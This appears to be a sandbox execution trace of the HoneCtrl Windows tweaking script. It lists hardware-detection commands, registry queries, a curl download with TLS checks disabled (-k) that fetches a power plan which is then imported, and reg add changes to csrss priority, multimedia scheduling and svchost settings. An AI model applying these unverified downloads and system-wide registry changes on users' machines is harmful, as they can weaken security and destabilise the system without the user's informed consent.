C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo [91mOFF "
C:\Windows\system32\find.exe
find "N/A"
C:\Windows\system32\curl.exe
curl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"
C:\Windows\system32\powercfg.exe
powercfg /d 44444444-4444-4444-4444-444444444449
C:\Windows\system32\powercfg.exe
powercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-444444444449
C:\Windows\system32\powercfg.exe
powercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get numberOfCores /value
C:\Windows\system32\powercfg.exe
powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0
C:\Windows\system32\powercfg.exe
powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0
C:\Windows\system32\powercfg.exe
powercfg -setactive "44444444-4444-4444-4444-444444444449"
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo [91mOFF "
C:\Windows\system32\find.exe
find "N/A"
C:\Windows\system32\curl.exe
curl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"
C:\Windows\system32\powercfg.exe
powercfg /d 44444444-4444-4444-4444-444444444449
C:\Windows\system32\powercfg.exe
powercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-444444444449
C:\Windows\system32\powercfg.exe
powercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get numberOfCores /value
C:\Windows\system32\powercfg.exe
powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 1
C:\Windows\system32\powercfg.exe
powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0
C:\Windows\system32\powercfg.exe
powercfg -setactive "44444444-4444-4444-4444-444444444449"
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d 5217772 /f
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass /t Reg_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority /t Reg_DWORD /d "3" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NoLazyMode" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "AlwaysOn" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_DWORD /d "10" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "SystemResponsiveness" /t REG_DWORD /d "0" /f
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
